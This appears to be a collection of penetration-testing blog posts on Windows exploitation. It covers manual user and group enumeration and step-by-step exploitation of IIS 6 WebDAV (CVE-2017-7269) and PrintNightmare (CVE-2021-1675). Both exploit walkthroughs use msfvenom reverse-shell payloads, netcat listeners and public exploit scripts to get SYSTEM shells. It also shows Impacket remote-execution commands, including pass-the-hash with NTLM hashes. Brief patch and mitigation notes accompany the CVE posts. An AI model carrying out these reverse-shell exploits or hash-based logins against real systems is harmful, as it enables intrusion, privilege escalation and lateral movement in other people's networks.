Windows Local user & local enumeration

by Vry4n_ | Dec 22, 2021 | Windows Exploitation

In this article we will learn to enumerate users and groups manually.

1. Check the current user

• echo %USERNAME% || whoami
• whoami

Powershell

• env:username

2. View the logged in user privileges

• whoami /priv

3. Display the user groups to which the current user belongs.

• whoami /groups

4. See the local users

• net user

Note: User1 is not listed as it is a Domain user

5. To view all users including local and domain users that have logged in to this machine

• whoami /all

6. You can also see local users using powershell

• Get-LocalUser
• Get-LocalUser | Select-Object -Property Name,Enabled,LastLogon

7. We could also get usernames by inspecting the users directory (C:/Users)

• Get-ChildItem C:/Users -Force
• Get-ChildItem C:/Users -Force | Select Name

8. The “Net Accounts” command is used to set the policy settings on local computer, such as Account policies and password policies. This command can’t be used on domain controller. This command is only used on local computer.

• net accounts

9. Learn more about a specific local user

• net user administrator

10. net localgroup displays the name of the server and the names of local groups on the computer.

• net localgroup

11. you can also get the local groups using Powershell

• Get-LocalGroup
• Get-LocalGroup | ft Name

12. You can also see the users that belong to a group

• net localgroup administrators

13. You can also get user membership using powershell

• Get-LocalGroupMember Administrators
• Get-LocalGroupMember Administrators | ft Name,PrincipalSource

Microsoft IIS ScStoragePathFromUrl function buffer overflow – CVE-2017-7269

by Vry4n_ | Sep 17, 2021 | Windows Exploitation

Microsoft IIS is vulnerable to a buffer overflow, caused by improper bounds checking by the ScStoragePathFromUrl function in the WebDAV service. By sending an overly long header beginning with If: http:// in a PROPFIND request, a remote attacker could overflow a buffer and execute arbitrary code on the system.

Affected Products

Microsoft IIS 6.0

Detection

Nmap

• nmap -T4 -p80 –script=http-iis-webdav-vuln 10.10.10.15

• nmap –script http-webdav-scan -p80 10.10.10.14

Exploitation (Metasploit)

1. For this we will use the module (iis_webdav_scstoragepathfromurl)

• search cve:2017-7269
• use exploit/windows/iis/iis_webdav_scstoragepathfromurl
• show options

2. Set the required options in this case

• set RHOSTS 10.10.10.15
• set RPORT 80
• set LHOST 10.10.14.4
• set LPORT 4444
• run

3. Once, we get the connection back we can get out shell

• shell

Note: You can use different payloads other than meterpreter, example windows/shell/reverse_tcp

1. Exploitation (Script)

There is another way to exploit this vulnerability using a custom script, I will use (https://github.com/danigargu/explodingcan)

1. Download the script from GitHub

• git clone https://github.com/danigargu/explodingcan.git
• cd explodingcan
• ls

2. Using MSFVenom create a payload in shellcode, and save it to a file

• msfvenom -p windows/shell_reverse_tcp -f raw -e x86/alpha_mixed LHOST=10.10.14.4 LPORT=4455 > shellcode_rev

3. Now start a netcat listener

• nc -lvp 4455

4. Run the script and pass the reverse shellcode as argument

• python explodingcan.py http://10.10.10.15 shellcode_rev

5. Now check the listener

2. Exploitation (Script)

There is another way to exploit this vulnerability using a custom script, I will use (https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269)

1. Download the script from GitHub

• git clone https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269.git
• cd iis6-exploit-2017-CVE-2017-7269
• ls

2. Now start a netcat listener

• nc -lvp 4455

3. Run the script and pass the arguments it needs, you can rename the script to add .py extension

• python “iis6 reverse shell” 10.10.10.14 80 10.10.14.4 4455

4. Now check the listener, we should have a shell back

• whoami

Remedy

Refer to Microsoft KB3197835 for patch, upgrade or suggested workaround information.

References

https://packetstormsecurity.com/files/142060

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7269

https://bugtraq.securityfocus.com/archive

https://exchange.xforce.ibmcloud.com/vulnerabilities/123756

https://www.f5.com/labs/articles/threat-intelligence/windows-iis-60-cve-2017-7269-is-targeted-again-to-mine-electroneum

https://nvd.nist.gov/vuln/detail/CVE-2017-7269

PrintNightmare (CVE-2021-1675): Remote code execution in Windows Spooler Service

by Vry4n_ | Jul 4, 2021 | Windows Exploitation

Microsoft Windows could allow a remote attacker to gain elevated privileges on the system, caused by a flaw in the Print Spooler component. By persuading a victim to open specially-crafted content, an attacker could exploit this vulnerability to execute arbitrary code with higher privileges.

This service spools print (Print Spooler) jobs and handles interaction with the printer. If you turn off this service, you won’t be able to print or see your printers.

The Microsoft Windows Print Spooler service fails to restrict access to the RpcAddPrinterDriverEx() function, which can allow a remote authenticated attacker to execute arbitrary code with SYSTEM privileges on a vulnerable system.

The RpcAddPrinterDriverEx() function is used to install a printer driver on a system. One of the parameters to this function is the DRIVER_CONTAINER object, which contains information about which driver is to be used by the added printer.

An attacker can take advantage of the fact that any authenticated user can call RpcAddPrinterDriverEx() and specify a driver file that lives on a remote server. This results in the Print Spooler service spoolsv.exe executing code in an arbitrary DLL file with SYSTEM privileges.

Exploit code for this vulnerability that targets Active Directory domain controllers is publicly available as PrintNightmare. A client uses the RPC call to add a driver to the server, storing the desired driver in a local directory or on the server via SMB.

I will use for this demo https://github.com/cube0x0/CVE-2021-1675

Affected Products

• Microsoft Windows Server 2008 SP2 x32
• Microsoft Windows Server 2008 SP2 x64
• Microsoft Windows 7 SP1 x32
• Microsoft Windows 7 SP1 x64
• Microsoft Windows Server 2008 R2 SP1 x64
• Microsoft Windows Server 2012
• Microsoft Windows 8.1 x32
• Microsoft Windows 8.1 x64
• Microsoft Windows Server 2012 R2
• Microsoft Windows RT 8.1
• Microsoft Windows 10 x32
• Microsoft Windows 10 x64
• Microsoft Windows Server 2016
• Microsoft Windows Server 2019
• Microsoft Windows 10 ARM64
• Microsoft Windows 10 1809 for x64-based Systems
• Microsoft Windows 10 1809 for 32-bit Systems
• Microsoft Windows 10 1809 for ARM64-based Systems
• Microsoft Windows 10 1607 for 32-bit Systems
• Microsoft Windows 10 1607 for x64-based Systems
• Microsoft Windows 10 2004 for 32-bit Systems
• Microsoft Windows 10 2004 for ARM64-based Systems
• Microsoft Windows 10 2004 for x64-based Systems
• Microsoft Windows 10 1909 for 32-bit Systems
• Microsoft Windows 10 1909 for x64-based Systems
• Microsoft Windows 10 1909 for ARM64-based Systems
• Microsoft Windows 10 20H2 for 32-bit Systems
• Microsoft Windows 10 20H2 for ARM64-based Systems
• Microsoft Windows 10 20H2 for x64-based Systems
• Microsoft Windows Server (Server Core installation) 2019
• Microsoft Windows Server (Server Core installation) 2004
• Microsoft Windows Server (Server Core installation) 20H2
• Microsoft Windows Server (Server Core installation) 2016
• Microsoft Windows Server (Server Core installation) 2012 R2
• Microsoft Windows Server (Server Core installation) 2012
• Microsoft Windows Server for X64-based systems (Server Core installation) 2008 SP2
• Microsoft Windows Server for 32-bit systems (Server Core installation) 2008 SP2
• Microsoft Windows Server for X64-based systems (Server Core installation) 2008 R2 SP1
• Microsoft Windows 10 21H1 for 32-bit Systems
• Microsoft Windows 10 21H1 for ARM64-based Systems
• Microsoft Windows 10 21H1 for x64-based Systems

For this vulnerability to work the Print Spooler needs to be enabled (Running)

Also, we would need RPC to be an open port at the server side

• nmap -p 135 192.168.0.100

How to exploit

For this we will need a user & password for the domain controller. This is done from remote

1. Having already a shell & user credentials, we will first see if Spool service is running

• Powershell.exe Get-Service Spool

Note: we can also use impaket tools to determine if the server is running the service

• python3.9 /opt/impacket/examples/rpcdump.py @192.168.0.100 | grep MS-RPRN

2. Start a SMB server with anonymous log in enabled, the name of the share is going to be smb which will be hosting /tmp. First, I will edit /etc/samba/smb.conf

[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445
public = yes
security = user

[smb]
comment = Samba
path = /tmp/
guest ok = yes
read only = no
browsable = yes
writable = yes
force user = nobody
public = yes

• sudo vi /etc/samba/smb.conf

3. Now start the SMB service

• sudo service smbd start
• sudo service smbd status

Note: If the service is already running just restart smbd “sudo service mbd restart”

4. Now test the share, it should be with at least READ permissions

• smbmap -H 192.168.0.13

5. In the SMB server create a DLL reverse shell, I’ll use msfvenom, locate it within the share

• msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.0.13 LPORT=5555 -f dll > rev.dll
• ls rev.dll

6. Start a netcat listener

• nc -lvp 5555

6. Download the script (https://github.com/cube0x0/CVE-2021-1675), I’ll place it in /tmp

• cd /tmp
• git clone https://github.com/cube0x0/CVE-2021-1675.git

6. Run the script to see its options

• cd /tmp/CVE-2021-1675
• python3.9 CVE-2021-1675.py

Note: Before running the script you may need to install the version for impacket for this script to work

• sudo apt remove –purge impacket-scripts python3-impacket
• sudo apt autoremove
• pip3 uninstall impacket
• git clone https://github.com/cube0x0/impacket #you can also use https://github.com/SecureAuthCorp/impacket
• cd impacket
• pip install .
• sudo python3 ./setup.py install

7. Run the script using the domain controller IP / username / password / SMB reverse shell path

• python3 ./CVE-2021-1675.py vk9-sec.com/user1:Password1@192.168.0.100 ‘\\192.168.0.13\smb\rev.dll’

Note: In my case it seems to error, but the payload gets executed

8. Now check the netcat listener, we should have a session with NT Authority System rights

• whoami

Extra

1. The user I used to exploit this vulnerability has only Domain Users rights

• net user user1

Remedy

Use Microsoft Automatic Update to apply the appropriate patch for your system, or the Microsoft Security Update Guide to search for available patches.

Alternative: This vulnerability can be mitigated by stopping and disabling the Print Spooler service in Windows.

Mitigation

Disable Spooler service

Powershell

• Stop-Service Spooler -Force
• Set-Service -Name Spooler -StartupType Disabled

Registry

• REG ADD “HKLMSYSTEMCurrentControlSetServicesSpooler” /v “Start” /t REG_DWORD /d “4” /f

(Alternative) Uninstall Print-Services

• Uninstall-WindowsFeature Print-Services

References

https://exchange.xforce.ibmcloud.com/vulnerabilities/202477

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675

https://github.com/cube0x0/CVE-2021-1675

https://www.kb.cert.org/vuls/id/383432

https://github.com/afwu/PrintNightmare

https://github.com/LaresLLC/CVE-2021-1675

https://github.com/calebstewart/CVE-2021-1675

https://threatpost.com/poc-exploit-windows-print-spooler-bug/167430/

https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/

Impacket Remote code execution (RCE) on Windows from Linux

by Vry4n_ | Jun 20, 2021 | Windows Exploitation

Impacket is a collection of Python classes and functions for working with various Windows network protocols. It is a centerpiece of many different pentesting tools.

Impacket can work with plain, NTLM and Kerberos authentications, fully supporting passing-the-hash (PTH) attacks and more.

https://github.com/SecureAuthCorp/impacket

Psexec.py

This method is very similar to the traditional PsExec from SysInternals. In this case, however, Impacket uses RemComSvc utility.

The way it works is that Impacket will upload the RemComSvc utility on a writable share on the remote system and then register it as a Windows service.

This will result in having an interactive shell available on the remote Windows system via port tcp/445.

“You have to have administrator to PSExec.”

Requirements for PSExec

• Write a file to the share.
• Create and start a service.

https://0xdf.gitlab.io/2020/01/26/digging-into-psexec-with-htb-nest.html

How to use

1. It comes installed already in Kali, you can use whereis to see if it is already installed.

• whereis psexec
• psexec.py -h

2. If you don’t have it download it

• git clone https://github.com/SecureAuthCorp/impacket.git
• cd impacket
• find . -iname *psexec* 2> /dev/null
• python3.9 ./examples/psexec.py -h

2. Basic SMB session using user/password combination. You have to be administrator or have SVCManager service rights

Successful (Administrator user)

• python3.9 ./examples/psexec.py vk9-sec/vry4n:Admin.1@192.168.0.100

Unsuccessful (Regular user)

• python3.9 ./examples/psexec.py vk9-sec/user1:Password1@192.168.0.100

Note: We get an error when using a regular account, in this case we have a Writable directory, but, we don’t have permissions to run SVCManager (Error opening SVCManager on 192.168.0.100)

3. Debug while running, in this case we get “Access Denied”

• python3.9 ./examples/psexec.py vk9-sec/user1:Password1@192.168.0.100 -debug

4. Connect using a hash

• python3.9 ./examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e21bf3dfb1cb61fa095b40fb083149cf vry4n@192.168.0.100

5. Specify a port (if SMB is using other than 445)

• python3.9 ./examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e21bf3dfb1cb61fa095b40fb083149cf vry4n@192.168.0.100 -port 445

6. Specify the name of the file that will be uploaded

• python3.9 ./examples/psexec.py vk9-sec/vry4n:Admin.1@192.168.0.100 -remote-binary-name EXAMPLE-FILE

SMBexec.py

Smbexec.py method takes advantage of the native Windows SMB functionality to execute arbitrary commands on the remote system.

This approach does not require anything to be uploaded on the remote system and is therefore somewhat less noisy.

Note that the communication happens solely over port tcp/445.

Smbexec.py uses a similar approach to psexec w/o using RemComSvc. This script works in two ways:

• share mode: you specify a share, and everything is done through that share.
• server mode: if for any reason there’s no share available, this script will launch a local SMB server, so the output of the commands executed is sent back by the target machine into a locally shared folder. Keep in mind you would need root access to bind to port 445 in the local machine.

How to use

1. Display the tool basic menu

• python3.9 ./examples/smbexec.py -h

2. Basic session

• python3.9 ./examples/smbexec.py vk9-sec/vry4n:Admin.1@192.168.0.100

3. Using hashes

• python3.9 ./examples/smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e21bf3dfb1cb61fa095b40fb083149cf vry4n@192.168.0.100

wmiexec.py

wmiexec.py uses Windows Management Instrumentation (WMI) interface of the remote Windows system to spawn a semi-interactive shell.

Similarly as dcomexec method, wmiexec requires communication over 3 network ports / services.

First it uses ports tcp/135 and tcp/445, and ultimately it communicates with the Winmgmt Windows service over dynamically allocated high port such as tcp/50911.

This makes the wmiexec method more noisy than the other methods.

How to use

1. Display the tool help menu

• python3.9 ./examples/wmiexec.py -h

2. Basic connection

• python3.9 ./examples/wmiexec.py vk9-sec/vry4n:Admin.1@192.168.0.100

3. Connecting using hashes

• python3.9 ./examples/wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e21bf3dfb1cb61fa095b40fb083149cf vry4n@192.168.0.100

atexec.py

atexec.py uses the Task Scheduler service (Atsvc) on the remote Windows system to execute a supplied command. All network communication takes place over port tcp/445.

How to use

1. Display basic help menu

• python3.9 ./examples/atexec.py -h

2. Basic connection and command execution

• python3.9 ./examples/atexec.py vk9-sec/vry4n:Admin.1@192.168.0.100 systeminfo

3. Using a hash

• python3.9 ./examples/atexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e21bf3dfb1cb61fa095b40fb083149cf vry4n@192.168.0.100 systeminfo

dcomexec.py

Dcomexec.py method uses various DCOM endpoints such as MMC20.Application, ShellWindows or ShellBrowserWindow objects to spawn a semi-interactive shell on the remote system.

Using this method requires communication on multiple network ports (tcp/135, tcp/445) and internally utilizes the DCOM subsystem of the remote Windows system using a dynamically allocated high port such as tcp/49751

This generally makes this method somewhat more noisy that the other methods.

How to use

1. Display the basic help menu

• python3.9 ./examples/dcomexec.py -h

2. Basic connection

• python3.9 ./examples/dcomexec.py vk9-sec/vry4n:Admin.1@192.168.0.100

3. Using a hash

• python3.9 ./examples/dcomexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e21bf3dfb1cb61fa095b40fb083149cf vk9-sec/vry4n@192.168.0.100